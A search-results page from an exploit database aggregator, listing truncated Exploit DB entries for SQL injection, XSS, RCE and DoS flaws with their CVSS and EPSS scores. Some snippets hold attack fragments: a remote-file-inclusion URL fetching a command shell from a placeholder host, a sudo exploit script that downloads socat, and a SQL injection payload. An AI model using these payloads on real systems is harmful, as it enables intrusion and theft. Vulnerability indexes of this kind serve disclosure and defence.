Lucene search
K
ExploitdbMost viewed

47904 matches found

Exploit DB
Exploit DB
added 2021/01/06 12:0 a.m.220 views

H2 Database 1.4.199 - JNI Code Execution

Exploit Title: H2 Database 1.4.199 - JNI Code Execution Exploit Author: 1F98D Original Author: Markus Wulftange Date: 28 April 2020 Vendor Hompage: https://www.h2database.com/ Tested on: Windows 10 x64, Java 1.8, H2 1.4.199 References:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/07/08 12:0 a.m.220 views

Qmail SMTP 1.03 - Bash Environment Variable Injection

Exploit Title: Qmail SMTP 1.03 - Bash Environment Variable Injection Date: 2020-07-03 Exploit Author: 1F98D Original Authors: Mario Ledo, Mario Ledo, Gabriel Follon Version: Qmail 1.03 Tested on: Debian 9.11 x64 CVE: CVE-2014-6271 References: http://seclists.org/oss-sec/2014/q3/649...

10CVSS7AI score0.99999EPSS
Exploits132
Exploit DB
Exploit DB
added 2020/04/20 12:0 a.m.220 views

WordPress Plugin Simple File List 5.4 - Remote Code Execution

Exploit Title: Wordpress Plugin Simple File List 5.4 - Remote Code Execution Date: 2020-04-2019 Exploit Author: coiffeur Vendor Homepage: https://simplefilelist.com/ Software Link: https://wordpress.org/plugins/simple-file-list/ Version: Wordpress v5.4 Simple File List v4.2.2 import requests impo...

0.3AI score
Exploits0
Exploit DB
Exploit DB
added 2020/04/06 12:0 a.m.220 views

SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)

Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service PoC Exploit Author: 0xMoHassan Date: 2020-04-04 Vendor Homepage: https://www.spotauditor.com/ Software Link: http://www.nsauditor.com/downloads/spotauditorsetup.exe Tested Version: 5.3.4 Vulnerability Type: Denial of Service DoS Local...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/01/17 12:0 a.m.220 views

Trend Micro Maximum Security 2019 - Privilege Escalation

Exploit Title: Trend Micro Maximum Security 2019 - Privilege Escalation Date: 2020-1-16 Exploit Author: hyp3rlinx Vendor Homepage: www.trendmicro.com Version: Platform Microsoft Windows, Premium Security 2019 v15, Maximum Security 2019 v15 Internet Security 2019 v15, Antivirus + Security 2019 v15...

7.8CVSS7.7AI score0.00732EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/10/10 12:0 a.m.220 views

Microsoft Windows Kernel - Out-of-Bounds Read in CI!HashKComputeFirstPageHash While Parsing Malformed PE File

We have encountered a Windows kernel crash in CI!HashKComputeFirstPageHash while trying to load a malformed PE image into the process address space as a data file i.e. LoadLibraryExLOADLIBRARYASDATAFILE | LOADLIBRARYASIMAGERESOURCE. An example crash log generated after triggering the bug is shown...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/07/30 12:0 a.m.220 views

iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects

The class NSDataFileBackedFuture can be deserialized even if secure encoding is enabled. This class is a file-backed NSData object that loads a local file into memory when the NSData bytes selector is called. This presents two problems. First, it could potentially allow undesired access to local...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2011/01/26 12:0 a.m.220 views

Oracle Document Capture - Actbar2.ocx Insecure Method

Source: http://packetstormsecurity.org/files/view/97866/DSECRG-11-004.txt ActiveX components contain insecure methods. Digital Security Research Group DSecRG Advisory DSECRG-00153 Application: Oracle Document Capture Versions Affected: Release 10gR3 Vendor URL: www.oracle.com Bugs: insecure metho...

9.3CVSS7AI score0.11818EPSS
Exploits10
Exploit DB
Exploit DB
added 2010/04/30 12:0 a.m.220 views

Microsoft IIS 5.0 - Printer Host Header Overflow (MS01-023) (Metasploit)

$Id: ms01023printer.rb 9179 2010-04-30 08:40:19Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework...

10CVSS7AI score0.87032EPSS
Exploits10
Exploit DB
Exploit DB
added 2006/05/19 12:0 a.m.220 views

phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass

Title: phpBazar = 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password: /admin/admin.php?action=editmember&value=1...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2005/05/02 12:0 a.m.220 views

CodetoSell ViArt Shop Enterprise 2.1.6 - 'basket.php' Multiple Cross-Site Scripting Vulnerabilities

source: https://www.securityfocus.com/bid/13462/info ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2025/04/16 12:0 a.m.219 views

WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page

Exploit Title: WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page Date: 25-01-2024 Exploit Author: Rasime Ekici Vendor Homepage: www.softwareag.com Version: 10.15.0000-0092 Tested on: 10.15.0000-0092 CVE : 2024-23733 Description: The /WmAdmin/,/invoke/vm.server/login...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/05/23 12:0 a.m.219 views

Screen SFT DAB 600/C - Authentication Bypass Erase Account

!/usr/bin/env python3 Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Erase Account Exploit Author: LiquidWorm Vendor: DB Elettronica Telecomunicazioni SpA Product web page: https://www.screen.it | https://www.dbbroadcast.com...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/03/25 12:0 a.m.219 views

Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)

Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution RCE Unauthenticated Google Dork: N/A Date: 2022-9-23 Exploit Author: yousef alraddadi - https://twitter.com/y0usef11 Vendor Homepage:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/05/17 12:0 a.m.220 views

T-Soft E-Commerce 4 - SQLi (Authenticated)

Exploit Title: T-Soft E-Commerce 4 - SQLi Authenticated Exploit Author: Alperen Ergel Contact: @alpernae IG/TW Software Homepage: https://www.tsoft.com.tr/ Version : v4 Tested on: Kali Linux Category: WebApp Google Dork: N/A CVE: 2022-28132 Date: 18.02.2022 Description Step-1: Login as Admin or...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/05/11 12:0 a.m.219 views

ImpressCMS v1.4.4 - Unrestricted File Upload

Exploit Title: ImpressCMS v1.4.4 - Unrestricted File Upload Date: 7/4/2022 Exploit Author: Ünsal Furkan Harani Zemarkhos Vendor Homepage: https://www.impresscms.org/ Software Link: https://github.com/ImpressCMS/impresscms Version: v1.4.4 Description: Between lines 152 and 162, we see the function...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/09/23 12:0 a.m.219 views

WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)

Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery CSRF Date: 2/28/2021 Author: 0xB9 Software Link: https://wordpress.org/plugins/fitness-calculators/ Version: 1.9.5 Tested on: Windows 10 CVE: CVE-2021-24272 1. Description: The plugin add calculators for Water...

4.3CVSS4.7AI score0.01815EPSS
Exploits5
Exploit DB
Exploit DB
added 2021/09/15 12:0 a.m.219 views

Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)

Exploit Title: Support Board 3.3.3 - 'Multiple' SQL Injection Unauthenticated Date: 29.08.2021 Exploit Author: John Jefferson Li Vendor Homepage: https://board.support/ Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943 Version: 3.3.3 Tested on: Ubuntu 20.04.2 LT...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/06/18 12:0 a.m.219 views

ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation

Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation Exploit Author: Piyush Patil & Rafal Lykowski Vendor Homepage: https://icehrm.com/ Version: 29.0.0.OS Tested on: Windows 10 and Kali Description ICE Hrm Version 29.0.0.OS is vulnerable to session...

0.3AI score
Exploits0
Exploit DB
Exploit DB
added 2021/05/17 12:0 a.m.219 views

Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free

Exploit Title: Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free Date: 15/05/2021 CVE : CVE-2013-3893 PoC: https://github.com/travelworld/cve20133893trigger.html/blob/gh-pages/params.json Exploit Author: SlidingWindow Vendor Advisory:...

9.3CVSS9AI score0.8593EPSS
Exploits18
Exploit DB
Exploit DB
added 2021/03/04 12:0 a.m.219 views

Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)

Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection Authenticated Date: 04-03-2021 Exploit Author: Deepak Kumar Bharti Vendor Homepage: https://www.sourcecodester.com Software Download Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/02/26 12:0 a.m.219 views

Triconsole 3.75 - Reflected XSS

Exploit Title: Triconsole 3.75 - Reflected XSS Google Dork: inurl : /calendar/calendarform.php Date: 15/2/2021 Exploit Author: Akash Chathoth Vendor Homepage: http://www.triconsole.com/ Software Link: http://www.triconsole.com/php/calendardatepicker.php Version: alertdocument.domain...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/02/16 12:0 a.m.219 views

Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)

Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service PoC Date: 2021-02-15 Exploit Author: Ismael Nava Vendor Homepage: https://www.nsauditor.com/ Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Version: 3.2.2.0 Tested on: Windows 10 Home x64 STEPS Open the...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/21 12:0 a.m.219 views

Queue Management System 4.0.0 - "Add User" Stored XSS

Exploit Title: Queue Management System 4.0.0 - "Add User" Stored XSS Exploit Author: Kislay Kumar Date: 2020-12-21 Google Dork: N/A Vendor Homepage: http://codekernel.net/ Software Link: https://codecanyon.net/item/queue-management-system/22029961 Affected Version: Version 4.0.0 Patched Version:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/04/15 12:0 a.m.219 views

SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting

Title: SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting Author: Vulnerability Laboratory Date: 2020-04-15 Vendor: http://dropouts.in/ Software Link: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 CVE: N/A Document Title: =============== SuperBackup v2.0.5 iOS - V...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/31 12:0 a.m.219 views

FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)

Exploit Title: FlashFXP 4.2.0 Build 1730 - Denial of Service PoC Vendor Homepage: https://www.flashfxp.com/ Software Link Download: https://www.filehorse.com/download-flashfxp/22451/download/ Exploit Author: Paras Bhatia Discovery Date: 2020-03-30 Vulnerable Software: FlashFXP Version: 4.2.0 Buil...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/31 12:0 a.m.219 views

Redis - Replication Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Redis Replication Code Execution', 'Description' = %q This module can be used to leverage the extension functionality added since Redis 4.0.0 to...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/09 12:0 a.m.219 views

Google Chrome 67, 68 and 69 - Object.create Type Confusion (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Google Chrome 67, 68 and 69 Object.create exploit', 'Description' = %q This modules exploits a type confusion in Google Chromes JIT compiler. The...

8.8CVSS7.4AI score0.84564EPSS
Exploits6
Exploit DB
Exploit DB
added 2020/02/24 12:0 a.m.219 views

SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure

Exploit Title: SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure Author: Todor Donev Date: 2020-02-23 Vendor: https://secu.jp/ Product Link: https://secu.jp/support/831.html CVE: N/A !/usr/bin/perl SecuSTATION SC-831 HD Camera Remote Configuration Disclosure Copyright 2020 c Todor...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/02/06 12:0 a.m.219 views

Sudo 1.8.25p - 'pwfeedback' Buffer Overflow

!/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag = "\x04\x00\x00\x00" . "\x00"x24;...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/08/16 12:0 a.m.219 views

Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion

Exploit Title: Joomla! component comjsjobs 1.2.6 - Arbitrary File Deletion Dork: inurl:"index.php?option=comjsjobs" Date: 2019-08-16 Exploit Author: qw3rTyTy Vendor Homepage: https://www.joomsky.com/ Software Link: https://www.joomsky.com/5/download/1 Version: 1.2.6 Tested on: Debian/nginx/joomla...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/05/06 12:0 a.m.219 views

microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection

Sql Injection on microASP Portal+ CMS + Date: 05/05/2019 + Risk: High + CWE Number : CWE-89 + Author: Felipe Andrian Peixoto + Vendor Homepage: http://www.microasp.it/ + Contact: [email protected] + Tested on: Windows 7 and Gnu/Linux + Dork: inurl:"/pagina.phtml?explodetree" // use your...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/02/04 12:0 a.m.219 views

River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)

Exploit Title: River Past Ringtone Converter v2.7.6.1601 - Denial of Service PoC Discovery by: Rafael Pedrero Discovery Date: 2019-01-30 Vendor Homepage: http://www.riverpast.com/ Software Link : http://www.riverpast.com/ Tested Version: v2.7.6.1601 Tested on: Windows XP SP3 Vulnerability Type:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/04/04 12:0 a.m.219 views

Broadcom Wi-Fi SoC - TDLS Teardown Request Remote Heap Overflow

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1046 https://googleprojectzero.blogspot.ca/2017/04/over-air-exploiting-broadcoms-wi-fi4.html Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/04/08 12:0 a.m.218 views

X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)

Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting XSS Authenticated Exploit Author: Betul Denizler Vendor Homepage: https://x2crm.com/ Software Link: https://sourceforge.net/projects/x2engine/ Version: X2CRM v6.6/6.9 Tested on: Ubuntu Mate 20.04 Vulnerable Parameter: model CVE: Use...

5.4CVSS5.6AI score0.01831EPSS
Exploits4
Exploit DB
Exploit DB
added 2023/04/05 12:0 a.m.218 views

ImageMagick 7.1.0-49 - DoS

Exploit Title: ImageMagick 7.1.0-49 - DoS Author: nu11secur1ty Date: 02.07.2023 Vendor: https://imagemagick.org/ Software: https://imagemagick.en.uptodown.com/windows/download/82953605 Reference: https://portswigger.net/daily-swig/denial-of-service CVE-ID: CVE-2022-44267 Description: ImageMagick...

6.5CVSS6.9AI score0.76581EPSS
Exploits4
Exploit DB
Exploit DB
added 2023/03/31 12:0 a.m.218 views

qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)

Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service DoS Date: 2022-12-04 Exploit Author: Krzysztof Burghardt Vendor Homepage: https://mirage.io/blog/MSA03 Software Link: https://github.com/mirage/qubes-mirage-firewall/releases Version: = 0.8.0 & 0.8.4 Tested on: Qubes OS CVE:...

7.5CVSS7AI score0.21478EPSS
Exploits6
Exploit DB
Exploit DB
added 2023/03/27 12:0 a.m.218 views

Desktop Central 9.1.0 - Multiple Vulnerabilities

Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities Discovery by: Rafael Pedrero Discovery Date: 2021-02-14 Software Link : http://www.desktopcentral.com Tested Version: 9.1.0 Build No: 91084 Tested on: Windows 10 Vulnerability Type: CRLF injection CRLF - 1 CVSS v3: 6.1 CVSS vector:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/05/11 12:0 a.m.218 views

Beehive Forum - Account Takeover

Exploit Title: Beehive Forum - Account Takeover Date:08/05/2022. Exploit Author: Pablo Santiago Vendor Homepage: https://www.beehiveforum.co.uk/ Software Link: https://sourceforge.net/projects/beehiveforum/ Version: 1.5.2 Tested on: Kali Linux and Ubuntu 20.0.4 CVE N/A PoC:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/06/02 12:0 a.m.218 views

GetSimple CMS 3.3.4 - Information Disclosure

Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure Date 01.06.2021 Exploit Author: Ron Jost Hacker5preme Vendor Homepage: http://get-simple.info/ Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip Version: 3.3.4 CVE: CVE-2014-8722 Documentation:...

7.5CVSS7AI score0.14374EPSS
Exploits4
Exploit DB
Exploit DB
added 2021/03/04 12:0 a.m.218 views

Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)

Exploit Title: Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting XSS Date: 2021-03-04 Exploit Author: Tushar Vaidya Vendor Homepage: https://textpattern.com Software Link: https://textpattern.com/start Version: v 4.9.0-dev Tested on: Windows Steps-To-Reproduce: 1. Login into...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/02/24 12:0 a.m.218 views

LayerBB 1.1.4 - 'search_query' SQL Injection

Exploit Title: LayerBB 1.1.4 - 'searchquery' SQL Injection Date: 2021-02-19 Exploit Author: Görkem Haşin Version: 1.1.4 Tested on: Linux/Windows POST /search.php HTTP/1.1 Host: Target Payload: searchquery=Lffd' AND 8460=SELECT CASE WHEN 8460=8460 THEN 8460 ELSE SELECT 1560 UNION SELECT 2122 END--...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/02/08 12:0 a.m.218 views

WordPress Plugin Supsystic Digital Publications 1.6.9 - Multiple Vulnerabilities

Exploit Title: WordPress Plugin Supsystic Digital Publications 1.6.9 - Multiple Vulnerabilities Date: 24/07/2020 Exploit Author: Erik David Martin Vendor Homepage: https://supsystic.com/ Software Link: https://downloads.wordpress.org/plugin/digital-publications-by-supsystic.1.6.9.zip Version: 1.6...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/01/05 12:0 a.m.218 views

Resumes Management and Job Application Website 1.0 - Authentication Bypass

Exploit Title: Resumes Management and Job Application Website 1.0 - Authentication Bypass Sql Injection Date: 2020-12-27 Exploit Author: Kshitiz Raj manitorpotterk Vendor Homepage: http://egavilanmedia.com Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/23 12:0 a.m.218 views

Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS

Exploit Title: Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS Exploit Author: Vijay Sachdeva pwnshell Date: 2020-12-23 Vendor Homepage: https://www.sourcecodester.com/php/11238/sales-and-inventory-system-grocery-store.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/07/01 12:0 a.m.218 views

e-learning Php Script 0.1.0 - 'search' SQL Injection

Exploit Title: e-learning Php Script 0.1.0 - 'search' SQL Injection Date: 2020-06-29 Exploit Author: KeopssGroup0day,Inc Vendor Homepage: https://github.com/amitkolloldey/elearning-script Software Link: https://github.com/amitkolloldey/elearning-script Version: 0.1.0 Tested on: Kali Linux Source...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/05/19 12:0 a.m.218 views

qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting

Exploit Title: qdPM 9.1 - 'cfgappappname' Persistent Cross-Site Scripting Google Dork: N/A Date: 2020-05-19 Exploit Author: Kishan Lal Choudhary Vendor Homepage: https://qdpm.net Software Link: https://sourceforge.net/projects/qdpm/ Version: 9.1 Tested on: Windows 10 Description: The form paramet...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/05/12 12:0 a.m.218 views

Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting

Exploit Title: Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting Date: 2020-04-16 Exploit Author: Dylan Garnaud & Benoit Malaboeuf - Pentesters from Orange Cyberdefense France Vendor Homepage:...

5.4CVSS5.2AI score0.0312EPSS
Exploits4
Exploit DB
Exploit DB
added 2020/05/01 12:0 a.m.218 views

HardDrive 2.1 for iOS - Arbitrary File Upload

Title: HardDrive 2.1 for iOS - Arbitrary File Upload Author: Vulnerability Laboratory Date: 2020-04-30 Software: https://apps.apple.com/ch/app/harddrive/id383226784 CVE: N/A Document Title: =============== HardDrive v2.1 iOS - Arbitrary File Upload Vulnerability References Source:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/02/13 12:0 a.m.218 views

PANDORAFMS 7.0 - Authenticated Remote Code Execution

Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution Date: 2020-02-12 Exploit Author: Engin Demirbilek Vendor homepage: http://pandorafms.org/ Version: 7.0 Software link: https://pandorafms.org/features/free-download-monitoring-software/ Tested on: CentOS CVE: CVE-2020-8947...

9CVSS7AI score0.22476EPSS
Exploits5
Total number of security vulnerabilities5000